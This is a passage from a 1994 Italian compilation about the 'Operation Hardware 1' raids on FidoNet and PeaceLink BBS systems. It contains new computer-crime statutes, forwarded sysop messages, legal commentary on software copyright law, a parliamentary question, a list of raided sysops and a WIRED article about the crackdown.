penale e' inserito il seguente: Art. 635-bis (Danneggiamento di sistemi informatici e telematici).- Chiunque distrugge, deteriora o rende, in tutto o in parte, inservibili sistemi informatici o telematici altrui, ovvero programmi, informazioni o dati altrui, e' punito, salvo che il fatto costituisca piu' grave reato, con la reclusione da sei mesi a tre anni. Se ricorre una o piu' circostanze di cui als econdo comma dell'art. 635, ovvero se il fatto e' commesso con abuso della qualita' di operatore di sistema, la pena e' della reclusione da uno a quattro anni. Art. 10 1.- Dopo l'art. 640-bis del cosice penale e' inserito il seguente: Art. 640-ter (Frode informatica).- Chiunque, alterando in qualsiasi modo il funzionamento di un sistema informatico o telematico o intervenendo senza diritto con qualsiasi modalita' su dati, informazioni o programmi contenuti in un sistema informatico o telematico o ad esso pertinenti, procura a se o ad altri un ingiusto profitto con altrui danno, e' punito con la reclusione da sei mesi a tre anni e con la multa da lire centomila a due milioni. La pena e' della reclusione da uno a cinque anni e della multa da lire seicentomila a tre milioni se ricorre una delle circostanze previste dal numero 1) del secondo comma dell'art.640, ovvero se il fatto e' commesso con abuso della qualita' di operatore di sistema. Il delitto e' punibile a querela della persona offesa, salvo che ricorra taluna delle circostanze di cui al secondo comma o un'altra circostanza aggravante. Art. 11 1.- Dopo l'articolo 266 del CPP e' inserito il seguente: Art. 266-bis (intercettazioni di comunicazioni informatiche o telematiche).- Nei procedimenti relativi ai reati indicati nell'articolo 266, nonche' a quelli commessi mediante l'impiego di tecnologie informatiche o telematiche, e' consentita l'intercettazione del flusso di comunicazioni relativo a sistemi informatici o telematici ovvero intercorrente tra piu' sistemi. --------------------------------------------------------------------------- And now alcuni messaggi presi qua' e la' ... -------------------------MESSAGGI------------------------------------------ * Forwarded from "SYSOP.033 ->Conf. Sysop Italia" * Originally by Vertigo, 2:331/301 * Originally to Tutti * Originally dated 12 May 1994, 0:49 Salve a tutti. Quanto sto per riferirvi e' alquanto frammentario e confuso perche' deriva da informazioni raccolte da piu' fonti al telefono e quindi non ho tutti i dettagli: il succo comunque e' che nella giornata di mercoledi' 11 maggio la guardia di finanza ha compiuto una serie di raid presso molte BBS Fidonet, sequestrando computer ed apparecchiature! Pare che la cosa sia avvenuta nell'ambito di un'inchiesta sulla pirateria avviata dalla procura di Pesaro e avente come indiziati due tizi di nome Paolo Paolorosso e Riccardo Cardinali (non sono certo al 100% dei nomi, ma cosi' mi hanno riferito). La guardia di Finanza e' andata a casa di parecchi sysop Fidonet (e, pare, anche non Fidonet) per accertamenti, perquisendo le abitazioni, esaminando computer e dischetti e sequestrando materiale (computer, stampanti, modem, dischetti) o sigillandolo. Conosco i nominativi di sysop solo del 331 visitati dalla finanza, tra i quali Alfredo Persivale, Domenico Pavone, Valentino Spataro, Luca Croci, Luca Spada e Walter Mascarin, ma credo che la cosa sia estesa anche altrove in Italia. Ho parlato telefonicamente con Domenico, il quale riferisce che hanno addirittura messo i sigilli alla stanza contenente computer e dischetti, nella quale ora non puo' piu' entrare. Non si ha idea del motivo per cui queste persone (sulle cui BBS non era presente materiale piratato) siano state coinvolte nell'inchiesta. Se qualcuno ha informazioni piu' precise in merito, si faccia avanti. Oggi mi incontrero' con un po' di persone coinvolte nella cosa e cercheremo di fare il punto della situazione. Credo sia superfluo invitare tutti alla massima cautela e collaborazione. Ciao, --V-- * Forwarded from "SYSOP.033 ->Conf. Sysop Italia" * Originally by Enrico Franceschetti, 2:335/212.1 * Originally to Tutti * Originally dated 13 May 1994, 16:27 Ciao a tutti. Assisto con sgomento e meraviglia a quanto e' accaduto l'11 maggio scorso a molti amici e "colleghi" sysops di tante parti d'Italia. Un provvedimento di un giudice pesarese, motivato dalla necessita' di sgominare un traffico di software duplicato, ha dato la stura ad una serie di azioni istruttorie e misure cautelari davvero notevole. Tutti abbiamo sentito parlare di attrezzature elettroniche (a volte anche banali, come segreterie telefoniche o apparecchi autocostruiti) poste sotto sequestro, di perquisizioni minutissime in appartamenti ed aziende, di sigilli poste ad ambienti di casa. Insomma, un vero e proprio blitz organizzato pensando di affrontare una organizzazione oliata e ben esperta nel crimine. Ma cio' e' plausibile? Quale professionista ed "operatore del diritto" rimango colpito dal modo con cui questa serie di azioni sono state eseguite. Vengono di fatto inferti a privati cittadini, senza l'esistenza di sostanziali elementi di prova a loro carico, danni notevolissimi di carattere economico e morale. Il blocco di un computer, la sua asportazione, l'impossibilita' di svolgere le consuete attivita' lavorative ad esso legate, comportano un ingiusto danno da sopportare, assolutamente sproporzionato sia agli elementi in possesso degli inquirenti e sia al tipo di reato contestato (non si riesce ad immaginare la portata delle azioni che, basandosi sul metro di quanto abbiamo visto, do- vrebbero venire attuate quando di mezzo vi sono organizzazioni criminali ben piu' pericolose ed attive). Per non parlare poi delle spese legali che dovranno essere affrontate da chi ha ricevuto avvisi di garanzia, il 100% dei quali, ne sono certo, si sgonfieranno come neve al sole; non prima pero' di aver tenuto in ambasce famiglie intere e costretto le medesime a notevoli esborsi economici. In sostanza, e denegando ogni principio giuridico esistente, occorre dimostrare di essere innocenti... e sopportare in silenzio le conseguenze della propria "presunta colpevolezza". Ma non basta. So che da tempo un'altra struttura pubblica di investigazione stava preparando con accuratezza una indagine sulle Bbs pirata; da mesi, con infiltrazioni, contatti, appostamenti, si stava raccogliendo il materiale necessario per inchiodare i veri responsabili di questo traffico illecito alle proprie responsabilita'. Ora, l'intervento clamoroso di questo magistrato, lungi dall'aver colpito veri "pirati" ha ottenuto l'unico effetto di terrorizzare decine di onest'uomini e far scappare (distruggendo ogni materiale illegale) i professionisti della copia i quali, messi in allarme da questo inutile polverone, saranno ora molto piu' attenti e cauti nelle loro attivita'. A chi giova tutto cio'? La risposta e' di difficile individuazione. Certo, non puo' sfuggire la grossolanita' dell'intervento operato e la sua durezza, nonche' la scarsissima preparazione tecnica denotata dalle varie "squadre" di finanzieri che si sono mosse in tutto il paese, preferendo troppo spesso sequestrare e sigillare piuttosto che cercare di comprendere cosa si trovavano davanti. Ugualmente non puo' non notarsi come la telematica amatoriale in Italia sia davvero strumento "potente" per la diffusione e la circolazione delle idee. Forse come in nessuna altra parte del mondo in Italia le "reti" amatoriali conservano uno spirito appunto "amatoriale" che le rende disponibili facilmente ad una grande platea di utenti, strangolati invece dalle elevate tariffe dei servizi pubblici (Videotel in testa). Allo stato non sappiamo ancora quali sviluppi attenderci: speriamo solo di non essere costretti ad ammettere che il paese che una volta era la culla del diritto e' divenuto oggi soltanto un paese di indagati ed inquisitori. Ciao, Enrico * Forwarded from "SYSOP.033 ->Conf. Sysop Italia" * Originally by Vertigo, 2:331/301 * Originally to Tutti * Originally dated 13 May 1994, 11:39 Copia in SYSOP.033 e crash agli NC/NEC. Alcune notizie sparse sulla faccenda dei sequestri, scusate la telegraficita' 1) Ieri sera qui a Milano ci siamo incontrati in parecchi tra sysop coinvolti e non, per discutere della faccenda. Con la sola eccezione di Walter Mascarin e Michele Fadda, a quanto mi risulta, a tutti e' stato sequestrato il materiale informatico, portandolo via o sigillando i locali in cui era contenuto. 2) Occorre immediatamente organizzarsi per cercare legali in loco (Pesaro). Qualcuno si e' gia' mosso personalmente (Luca Spada ha preso un avvocato pesarese), Franco Mulato sta cercando di organizzarsi in questo senso. Avvertite tutti coloro che hanno ricevuto avviso di garanzia di mettersi in contatto con Franco Mulato, inviandogli copia del documento via fax al numero 0574- 38816 ed allegando un recapito telefonico a VOCE. 3) Domenica pomeriggio a Bologna ci sara' un incontro straordinario per discutere della faccenda. Sede e dettagli ancora da definire, teniamoci in contatto telefonicamente, il mio numero d'ufficio e' 02-76001713. 4) Io e la Folletta, su proposta di Pasquini, ci stiamo organizzando per stendere il testo di un'interpellanza parlamentare sull'accaduto che dovrebbe essere inoltrata dal radicale Roberto Cicciomessere nei prossimi giorni. Chi avesse materiale da sottoporre o proposte me le faxi in ufficio (fax 02-780472). 5) Occorre cercare di organizzare una specie di sottoscrizione per raccogliere qualche soldo per le spese (avvocati etc.) a favore di chi e' gia' stato coinvolto e di chi lo sara' prossimamente. L'impressione comune e' che la cosa procedera' anche nei prossimi giorni con nuovi raid e sequestri. 6) Su "La Repubblica" di oggi e' apparso un articolo a pag. 21 a firma di Claudio Gerino che descrive l'accaduto. Non ho visto finora riferimenti su altri quotidiani. Ciao, --V-- (RC) * Forwarded from "SYSOP.033 ->Conf. Sysop Italia" * Originally by Sandro Gasparetto, 2:334/201 * Originally to All * Originally dated 14 May 1994, 20:19 * Crossposted in SYSOP.033 * Crossposted in NETSYSOP.334 Per fortuna non sono venuti da me (ancora). Nel dubbio ho interpellato il mio avvocato, e gli ho chiesto come comportarmi. Il mio avvocato e' pure un amico da decenni (andavamo a scuola insieme), per cui mi fido di quello che mi ha detto, e con me non si esprime in termini oscuri, ma mi ha sempre aiutato. - Arrivano con un mandato, per cui non e' possibile fermarli o opporsi. - Hanno un ordine esecutivo, possono fare quasi di tutto, ma..... - se il PC e' legato ad una attivita' (hardware o software) non hanno assolutamente il potere di fermare questa attivita' commerciale (se non temporaneamente), per cui con un buon avvocato si puo' fare in modo che prelevino quanto serve per la loro inchiesta, senza pregiudicare il proseguimento della attivita'. Si puo' parlare di copie o simili cose.... - l'eventuale sequestro dovrebbe essere di breve durata. Lui conta di fare ottenere velocemente il dissequestro al mio amico Gianni. - Secondo lui ( e' in contatto con un altro avvocato di Pesaro) l'inchiesta e' stata "a campione", partendo da indirizzi trovati a caso. Nel mucchio hanno preso anche gente che non c'entra niente. Ma ora dovrebbe essere tutto finito. ( no altre visite...) - Lui pensa che l'andazzo di usare metodi "terroristici e vessatori" dovrebbe smettere, e lui conta che tra non molto cambi. La gente che lavora dovrebbe non essere piu' criminalizzata di una finanza che tiene in ostaggio una intera classe sociale. Quest'ultima e' una mia considerazione, prendetela come uno sfogo. bye, Sandro * Area : SYSOP.033 ->Conf. Sysop Italia * From : Vertigo, 2:331/301 (Mercoledi Maggio 18 1994 19:57) * To : Tutti * Subj : ANSA: altri 14 ! Appena arrivato! :-( Torino, 18 Mag 19:20 INFORMATICA: DENUNCIATI IN TUTTA ITALIA 14 "PIRATI" Quattordici "pirati informatici" italiani che, avvalendosi di collegamenti telematici con esperti americani, sottraevano aoftware ai produttori e poi li commercializzavano in Italia a prezzi irrisori, sono stati denunciati a piede libero dal nucleo regionale di polizia tributaria della Guardia di Finanza. Nell'operazione e' stato sequestrato materiale complessivo per un valore di circa quattro miliardi di lire: 17 personal computer, 13690 floppy disk contenenti software illecitamente duplicato, otto dischi CdRom, 27 modem per collegamenti tramite linee telefoniche, quattro apparecchiature per l'utilizzo di linee telefoniche, manuali di istruzione per programmi e componenti per elaboratori elettronici. La Guardia di Finanza, che sta ancora completando le indagini, non ha reso noto i nominativi degli indagati, ma soltanto le citta' dove sono stati fatti i sequestri: Torino, Poirino (Torino), Sesto san Giovanni (Milano), Savona, Genova, Pesaro, Terni, Napoli, Pesaro e Pescara. "La tecnologia utilizzata dai pirati - e' detto in una nota della Guardia di Finanza - ha stupito gli stessi militari del nucleo regionale di polizia tributaria, che si sono trovati di fronte a soggetti utilizzatori di comunicazioni via satellite, di 'call card' contraffatte per usufruire delle reti telefoniche private nordamericane e dei piu' avanzati personal computer". (ANSA) Msg#: 2979 Rec'd Local Date: 26 May 94 00:34 From: Il Conte Read: Yes Replied: No Subj: risposte PRIMA DOMANDA: Se ti vedi spuntare la GdF a casa, accendi subito un lumino al tuo Santo preferito, perche' sono guai. I cattivi, muniti di mandato di perquisizione e sequestro, arrivano e ti chiedono: a) di vedere i tuoi dischetti; se ne trovano di non originali, contenenti files .EXE e simili, li mettono in uno scatolino e li sequestrano; b) di stampare la directory del tuo hard disk (per esempio, con un DIR /s(ubdirectories) /h(idden); dal nome delle subdirectories o dei programmi, li identificano e ti chiedono le licenze originali; se hai tutti programmi regolarmente acquistati bene, se no procedono al sequestro del computer (quale cosa che servi' a commettere il presunto reato). c) non sono in grado di precisare se la GdF conosce l'esistenza dei programmi Public Domain o Shareware: volendo, potrebbero ritenere abusivi anche tali programmi. * * * Il sequestro si effettua mediante: - sigillatura dello scatolo contenente i dischetti, che vengono descritti nel verbale; - sigillatura del computer, su cui viene apposta una striscia di carta con i timbri della P.G. che ne impediscono l'uso. La GdF (o gli altri organi di Polizia Giudiziaria) redigono un verbale di sequestro, dove e' allegata la DIR dell'HDD, e trasmettono tutto all'Autorita' Giudiziaria. * * * Contro il sequestro e' consentito il ricorso al c.d. Tribunale della Liberta' (o del riesame); ne ho fatto uno, e me l'hanno rigettato con una motivazione del tipo: vediamo il processo, e poi ti diremo se il sequestro e' legittimo. * * * L'Autorita' Giudiziaria, poverina, non sa nulla di informatica e si rivolge ad un perito perche' esamini il materiale sequestrato e dica la sua. All'esito, dopo qualche anno, potrebbe rinviarti a giudizio, ed allora comincerebbe a discutersi: - di quali fatti ti hanno incolpato; - di quali prove ritengono di avere. L'unico soggetto oggettivamente avvantaggiato di tale situazione e' il perito, il quale si trova ad avere numerosi e remunerati incarichi a spese dello Stato. * * * E se, dopo un paio di anni (almeno), ti assolvono per non aver commesso il fatto, o perche' il fatto non sussiste ? Niente: ti dicono (forse) "scusi tanto", e tutto finisce li', visto che il risarcimento e' previsto solo per chi patisce una ingiusta detenzione e non per chi sta qualche anno senza computer e/o senza programmi lecitamente acquistati. Altro che da ridere: ci sara' da piangere. E se ti condannano ? E se la BSA o l'Assoft si costituiscono parte civile nel processo, per chiedere il risarcimento dei danni ? * * * SECONDA PARTE DELLA DOMANDA Il vecchissimo PCTOOLS dell'88, ai fini che ci interessano, e' perfettamente equivalente all'ultimo costosissimo game piu' o meno virtuale: il passare degli anni, come sappiamo, rende del tutto fuori commercio un programma, ma non ne autorizza affatto la copiatura abusiva. Per quanto riguarda la sussistenza o meno del reato, vedi appresso. * * * TERZA ED ULTIMA PARTE Nello spirito attuale di caccia alle streghe, stanno chiudendo le BBS (Costituzione, aiutaci tu se prima non ti stracciano sti' leghisti del ca**o): sarebbe antipatico se, ad esempio, il sistema contenesse la indicazione (che non costituisce una prova, ma un indizio) che l'utente ICS ha prelevato (in data --- alle ore ---) un file contenente un programma abusivamente duplicato. * * * INSOMMA: QUAL'E' IL CONTENUTO DI 'STA BENEDETTA LEGGE ? Boh ! Nel senso che siamo a livelli (anche di stupidita' ed ignoranza) seriamente preoccupanti. Basta vedere l'annunzio pubblicato dalla BSA qualche mese fa su MCMicrocomputer: una sorta di scheda per fare la spia, e denunciare (magari rimanendo anonimi) il conoscente, o la persona semplicemente antipatica, che detiene software illegalmente duplicato. Avete mai visto, su qualche rivista o giornale, una scheda di questo tipo per denunciare (che so io) i casi di violenza sui minori, o di spaccio di droga davanti alle scuole ? Questo dovrebbe significare, agli occhi di un ingenuo osservatore alieno, che scopiazzare il software e' assai piu' grave (o socialmente riprovevole) che spegnere le sigarette sulla pancia dei figli che strillano troppo e vendere il crack ai quattordicenni stanchi della vita. * * * In ordine al contenuto della legge sul diritto d'autore (novellata dal D. Leg.vo 29-12-1992 n. 518), nessuno dei tecnici del diritto - me compreso - ha le idee chiare, data la novita' della riforma ed il suo contenuto schifosamente atecnico (sia dal punto di vista giuridico che da quello informatico). Essendo poco chiaro per un giurista, il testo novellato della legge e' davvero incomprensibile ai comuni mortali: cio' nonostante, mettero' a disposizione dell'area quanto e' a mia conoscenza (non ho un testo completo). * * * Anteriormente alla novella di cui al citato D.L.vo n. 518/92, le norme incriminatrici connesse alla tutela del diritto d'autore erano contenute esclusivamente nel titolo III, capo III, sezione II della Legge 22 aprile 1941 n. 633, intitolata "Difese e sanzioni penali" (artt. 171 e 172). L'unica norma punitiva applicabile ai programmi per elaboratore era, sino alla novella, l'art. 171 lett. a), che punisce chiunque : "riproduce, trascrive, recita in pubblico, diffonde, vende o mette in vendita o pone altrimenti in commercio un'opera altrui o ne rivela il contenuto prima che sia reso pubblico, o introduce e mette in circolazione nello Stato esemplari prodotti all'estero contrariamente alla legge italiana (...)". A seguito della citata novella, e' stato introdotto l'art. 171 bis, il quale cosi' dispone: "Chiunque abusivamente duplica a fini di lucro programmi per elaboratore o, ai medesimi fini e sapendo o avendo motivo di sapere che si tratta di copie non autorizzate, importa, distribuisce, vende, detiene a scopo commerciale, o concede in locazione i medesimi programmi, e' soggetto alla pena della reclusione da tre mesi a tre anni e della multa da L.500.000 a L.6.000.000. Si applica la stessa pena se il fatto concerne qualsiasi mezzo inteso unicamente a consentire o facilitare la rimozione arbitraria o l'elusione funzionale dei dispositivi applicati a protezione di un programma per elaboratore. La pena non e' inferiore nel minimo a sei mesi di reclusione e la multa a L.1.000.000 se il fatto e' di rilevante gravita' ovvero se il programma oggetto dell'abusiva duplicazione, importazione, distribuzione, vendita, detenzione a scopo commerciale o locazione sia stato precedentemente distribuito, venduto o concesso in locazione su supporti contrassegnati dalla Societa' italiana degli autori ed editori ai sensi della presente legge e del relativo regolamento di esecuzione approvato con regio decreto 18 maggio 1942 n. 1369. La condanna per i reati previsti al comma 1' comporta la pubblicazione della sentenza in uno o piu' quotidiani e in uno o piu' periodici specializzati." * * * Primo dubbio: vale il principio secondo cui una norma dettagliata (il nuovo art. 171 bis) annulla la precedente norma generica (il vecchio art. 171), oppure le norme coesistono entrambe, riguardando fattispecie diverse ? Credo, sinceramente, che l'art. 171 non sia piu' applicabile al software, regolato da una nuova e specifica norma, se non mi ingannano le dure pagine dei manuali di diritto penale digerite all'universita' (e, purtroppo, anche ora). Si dovrebbero, quindi, distinguere due tipi di comportamenti penalmente sanzionati dal citato art. 171 bis: a) la abusiva duplicazione, a fini di lucro, di programmi per elaboratore ("Chiunque abusivamente duplica a fini di lucro programmi per elaboratore"); b) la importazione, distribuzione, vendita, detenzione a scopo commerciale, o la locazione di programmi per elaboratore, fatta a fini di lucro, da parte di chi sa od ha motivo di sapere che si tratta di copie non autorizzate ("ai medesimi fini e sapendo o avendo motivo di sapere che si tratta di copie non autorizzate, importa, distribuisce, vende, detiene a scopo commerciale, o concede in locazione i medesimi programmi"). Ai posteri l'ardua sentenza: aspettiamo di vedere le prime decisioni, ed i primi ricorsi per cassazione, e allora si' che ci sara' da ridere. 489 27-Giu-94 14:00 3626 G.Borrello I Roma --------------------------------------------------------------------- INTERROGAZIONE PARLAMENTARE (a risposta scritta) Atti Parlamentari Camera dei Deputati, Seduta del 24 giugno 1994 NARDINI Maria Celeste, VOCCOLI Francesco (Rifondazione) Ai Ministri delle finanze, delle poste e telecomunicazioni e dell'interno. Per sapere - - premesso che: in data 3 giugno 1994 e stata sequestrata la banca dati centrale della rete Peacelink in seguito ad una perquisizione ordinata da un magistrato di Taranto; la banca dati centrale della rete telematica Peacelink: era pubblicizzata su tutte le riviste pacifiste; aveva diffuso in tempo reale, lo scorso anno, le informazioni sulla conferenza ONU di Vienna sui diritti umani; era il supporto telematico per la realizzazione del giornale "I Siciliani", fondato da Giuseppe Fava, giornalista assassinato dalla mafia; era stata segnalata da RAI Televideo nell'ambito della rubrica "L'Italia antipiovra" e "Spazio civile" per l'impegno antimafia; era stata segnalata da RAI Televideo nell'ambito della rubrica "Spazio civile" per i suoi collegamenti telematici con la ex Jugoslavia e per i soccorsi umanitari che si avvalevano di una banca dati specializzata dell'Italian consorzium of solidarity e di una struttura di volontariato dell'aria (elisoccorso Montecalvoli), ragion per cui l'Alto commissariato per i rifugiati ONU ne aveva chiesto la collaborazione per i soccorsi di emergenza; era utilizzata da insegnanti per attivita di educazione alla pace e alla legalita; sul settimanale "Avvenimenti" in data 15 giugno 1994 appare che tale attivita, in particolare quella relativa al pacifismo e al contatto con le scuole era assoggettata a forme di controllo e -pare- di interferenza da parte di uomini dei servizi poco prima che avvenisse l'attentato al giudice Falcone; il bliz della banca dati centrale di proprieta di Giovanni Pugliese, sita in Statte (TA), e basato su una indagine promossa da un capitano della Guardia di finanza di Taranto che ha ritenuto sicure e affidabili voci viceversa fantasiose e infondate di uso di tale banca dati per diffondere a scopo di lucro programmi per computer copiati; tale raccolta di informazioni non e stata verificata mediante collegamenti via modem dalla Guardia di finanza di Taranto- se siano a conoscenza dei fatti citati; se la Guardia di finanza di Taranto sia dotata di modem e se sia in grado di usarlo per compiere accertamenti sulle banche dati telematiche; per quali motivi non sia stata fatta alcuna verifica via modem delle fantasiose voci giunte alla Guardia di finanza; se i Ministri in indirizzo non ravvisino in un simile episodio la spia per una scarsa professionalita e non ritengano di avviare un'indagine sui livelli di preparazione specifica di tali apparati, in relazione alla prevenzione e alla repressione della criminalita informatica e telematica, prima che si verifichino altre perquisizioni e sequestri che -fallendo clamorosamente l'obiettivo- finiscano per colpire strutture di volontariato informativo che andrebbero al contrario promosse e sostenute; se attualmente i servizi di informazione stiano svolgendo un ruolo di acquisizione di notizie sulle reti telematiche, a che scopo e se in tale indagine sia stata coinvolta -e per quale motivo- anche Peacelink, nota per i meriti acquisiti nelle attivita sopra elencate; quali azioni intendano intraprendere allo scopo di evitare che simili situazioni non abbiano piu a ripetersi; come intendano garantire alla banca dati della rete telematica Peacelink la ripresa di una attivita essenziale, nonche riconosciuta da piu parti, alla crescita di una coscienza pacifista e alla difesa dei diritti umani. * Forwarded from "SYSOP.033 ->Conf. Sysop Italia" * Originally by Felice Murolo, 2:335/206@fidonet.org * Originally to all * Originally dated 16 May 1994, 12:51 ** AGGIORNAMENTO ** Segue lista BBS visitati da GDF desunta da messaggi e telefonate. Scusate le omissioni e imprefezioni. Notizie: - Gli avvisi di garanzia emessi sono stati 173. - L'avvocato Francesco Guida di Taranto, che collabora con PeaceLink, ha costituito un gruppo di studio del problema. FAX/segreteria 099 365812, richiede l'invio di tutte le infos possibili. Fido: ------ Luca Spada 2:331/106-117-121 sequestrato tutto Alberto Giovaninetti 2:331/103 sequestrato tutto Luca Croci 2:331/108 ? Ascanio Orlandini 2:331/203 solo perquisito Paolo Borghesi 2:331/204 sequestrato tutto Alfredo Persivale 2:331/302 sequestrato tutto, anche comp. azienda Michele Fadda 2:331/320 solo perquisito Walter Mascarin 2:331/323 solo perquisito Domenico Pavone 2:331/331 sequestrata la stanza del computer! Othmar Tschrepp 2:331/334 sequestrato o sigillato Giulio Cipriani 2:331/344 sequestrato tutto Valentino Spataro 2:331/347 sequestrato tutto Franco Mulato 2:332/101 ? Samuele Landi 2:332/115 sequestrato tutto Max Morando 2:332/200 sequestrato tutto Massimo Berni 2:332/300-301 sequestrato tutto Roberto Nucci 2:332/303 ? Alberto Tommasoli 2:332/306 ? Riccardo Pizzi 2:332/307 sequestrato tutto Alessandro Trebbi 2:332/313 ? Lorenzo Lugli 2:332/315 sequestrato tutto a casa sua (la bbs no) Fabrizio Carloni 2:332/316 sequestrato tutto Massimo Sabbatini 2:332/320 sequestrato tutto, compreso negozio Alessandro Benvenuti 2:332/400 sequestrato tutto Paolo Sinigaglia 2:332/2-407-417-427 sequestrato tutto Marcello Ardini 2:332/418 sequestrato tutto Mario Mure' 2:332/505 sequestrato tutto Marco Venturini Auti 2:332/617 sequestrato tutto Riccardo Iacobucci 2:332/618 sequestrato tutto Mario Zambon 2:333/203 sequestrato solo dischetti Piergiorgio Ghezzo 2:333/707-708 ? Gianni Bragante 2:334/307 sequestrato Hard Disk Paolo Goria 2:334/701 risparmiato, sequestrato computers sponsor Andrea Contini 2:335/428 sequestrato tutto Alberto Marcedone 2:335/503 convocato dai CC Marco Tomassoni 2:335/514 convocato dai CC Michele Scopelliti 2:335/512 sequestrato tutto Giuseppe Giardina 2:335/713 sequestrato tutto Non fido: ---------- Vittorio Mori ex fido, non piu' bbs, sequestrato tutto Curradini "Breakdown", sequestrato tutto Giuseppe Paterno' "Il Tempio BBS", sequestrato tutto Super pirata, Terni non identificato, sequestrato tutto Riccardo Cassotti perquisito, BBS chiusa 8 mesi fa. Points: -------- Borghesi 2:331/204.3 sequestrato tutto Caruso 2:331/204.6 sequestrato tutto Bisanti ?? sequestrato tutto Ciao Felix 574 7-Lug-94 00:54 2949 V.Russo I Roma ----------------------------------------------------------------------------- PeaceLink - studio legale avv.Guida Vi giro un mes ricevuto da Alessandro Marescotti in area AVVENIMENTI. Valerio Ciao Valerio! Ieri notte mi chiedevi - per conto di Parrella - informazioni piu' particolareggiate sui motivi che hanno indotto il Tribunale di Taranto a rifiutare il dissequestro del BBS host di PeaceLink, cioe' quello di Pugliese. Questo e' almeno cio' che ho capito nel sonno... ;-)) Particolari sulle motivazioni del mancato dissequestro si possono chiedere all'avv.Francesco Guida, il cui numero dello studio e' 099/365812 (tel./fax). Sara' fatta a questo punto una nuova richiesta di dissequestro, non piu' al Tribunale del Riesame ma al Gip, adducendo motivazioni legali concernenti non piu' la non regolarita' dell'azione del PM ma la peculiare azione del BBS in termini di servizio la cui interruzione puo' causare danno alla comunita'. Mi sono espresso in termini forse infelici, non sono un avvocato... Circa le motivazioni del non dissequestro, il Tribunale del Riesame, nonostan- te avesse avuto tutto il tempo di esaminare per bene la faccenda dato che sussisteva lo sciopero degli avvocati, non ha voluto ficcardi in una faccenda forse ritenuta troppo complicata ed inedita da riesaminare. Certo e' che l'avv.Guida vorrebbe avere da qualcuno che in Italia ha un po' di dati, la documentazione di dissequestri gia' avvenuti nei giorni scorsi, dopo l'azione Hardware1 di Pesaro, con relative motivazioni. Il Tribunale del Riesame ha evidenziato una cattiva volonta' di fondo, tanto da ritenere che il contributo di 100 mila lire fornito dal Liceo Classico Ar- chita di Taranto e dall'Istituto Professionale Archimede "per l'uso del BBS" possano essere messi in relazione con l'accusa specifica che - ricordo - e' del tutto assurda: Pugliese viene accusato di aver chiesto dalle 50 alle 200 mila lire a collegamento telematico per trasferire programmi commerciali. La fonte di tale accusa e' coperta dal segreto istruttorio. Cio' che e' grave e' che la Guardia di Finanza non l'abbia verificata prima di passarla al Pubblico Ministero e che il Pubblico Ministero Benedetto Masellis, prima di accoglierla e far eseguire la perquisizione da Pugliese, non abbia richesto al capitano della Guardia di Finanza, tal Cazzato, una piu' precisa verifica delle fonti (dal capitano ritenute altamente affidabili). L'insieme di tutte queste "coincidenze" CI FA FORTEMENTE SOSPETTARE sull'indipendenza e sulla reale spontaneita' dell'operazione. Ragion per cui il nostro atteggiamento sta passando dal piano della cautela a quello piu' "politico" del sospetto sulle finalita' che mal si celano dietro a questa manovra che, colpendo Giovanni Pugliese, ha colpito tutti noi e - non dimentichiamolo - il cuore di PeaceLink: piu' in alto non potevano mirare. Se a settembre PeaceLink sara' piu' debole, vorra' dire che l'operazione era ben congegnata e aveva un fine ben calcolato. Ciao. Alessandro 609 14-Lug-94 08:16 2962 B.Parrella USA Oakland CA ---------------------------------------------------------------------------- Articolo su WIRED Magazine (Agosto 94). Riporto di seguito il testo integrale dell'articolo che appare a pagina 29 del n.2.08 del mensile WIRED Magazine. (NB: il pezzo e' stato chiuso in redazione il 7 giugno). ----------- Hacker Crackdown, Italian style Crackdowns on Italian BBSes demonstrate that US law enforcement agencies are not alone in dealing with Net crimes by shutting down as much of cyberspace as they can. Early in the morning of May 11, sysops in Italy awoke facing machine guns. Italian police, acting on a warrant, raided 119 Fidonet Italia bulletin board systems, according to Gaetano Savoldelli Pedrocchi, the Pesaro prosecu- tor managing the investigations. Police officials removed computer hardware, disks, answering machines, audiotapes, and other magnetic storage media, remi- niscent of the infamous "Operation Sundevil" in the United States in 1990. The police operation, code-named "Operation Hardware 1," targeted a suspected software piracy ring allegedly run by two users of a Pesaro-based BBS. The two may have used Fidonet Italia nodes to orchestrate the distribution of illegal- ly copied software. Most likely, police officials simply raided each Fidonet node named on a public phone-list held by the two suspected software pirates. "The crackdown needed to be done. Software piracy has become a national sport in Italy," Pedrocchi said in an interview with an Italian magazine. "We acted after precise information about the activities of a specific databank: if some operators have nothing to do with the charges, we'll verify it as soon as possible," Pedrocchi said. Fidonet prohibits the distribution of copyrighted software and secret passwords, as does Peacelink, another system whose main node was similarly raided several weeks after the Fidonet seizures. "The software pirates are a lot more hidden than an obviously public network like Fidonet," said Franco Mulato, president of the Fidonet Association of Italy. "This is a prime example of what happens when ignorant law enforcement butts heads with the online world," said Stanton McCandlish of the Electronic Frontier Foundation. "This is why getting police and other agencies up to speed, not to mention updating the law, is so important." Unfortunately, the Italian laws that were updated earlier this year to prohi- bit software piracy and copyright infringement continue to hold sysops respon- sible for any activity on their systems. Activists hope that when the dust clears from the raids, the relatively new Italian online community will unify to lobby for electronic civil rights laws by forming an Italian EFF-type orga- nization. "Even in Italy, electronic citizens are showing up," said Bernardo Parrella, US correspondent to Agora Telematica, Italy's equivalent to the Well. "The protection of civil rights is not a negotiable issue in a modern democracy." At press time, Italian courts were beginning to return the seized equipment. -- David Pescovitz 603 10-Lug-94 17:51 1370 B.Parrella USA Oakland CA 602 ----------------------------------------------------------------------------- Sicurezza e telematica. I piu' efferati crimini mafiosi, dagli omicidi dei magistrati allo spaccio di eroina e cocaina, vengono realizzati grazie all'uso di una fitta rete di telefoni cellulari: si e' forse criminalizzato la SIP per questo? Sia il crimine organizzato che la deliquenza comune fanno largo uso delle tecniche di intercettazione delle radio-frequenze della polizia: si e' mai scritto che le Poste debbano essere colpevoli? Ogni giorno migliaia di lettere, pacchi e telegrammi anonimi (contenenti minacce, testi atti a delinquere, perfino bombe) viaggiano su aerei e furgoni dei servizi postali mondiali: si e' forse deciso d'incriminare gli addetti a tali servizi? Certo, c'e' di che preoccuparsi dell'intrusione nei sistemi radar aerei - esattamente come c'e' da preoccuparsi per i casi sopra riportati. E, ripeto, i materiali "terroristici" in questione non arrivano solo sulle scrivanie dei giornalisti, ma molto piu' semplicemente sono disponibili a tut- ti sia su supporto cartaceo che elettronicamente. In nome della sicurezza sociale, possiamo discutere le regole della comunicazione globale, finanche a cambiarle - se riteniamo che la telematica sia un medium piu' pericoloso di altri. Ma allora, in piena buonafede, abbiamo prima di tutto il dovere di allargare il dibattito, esaminando con attenzione ogni possibile implicazione e conseguenza. [ N.d.R. Questi 2 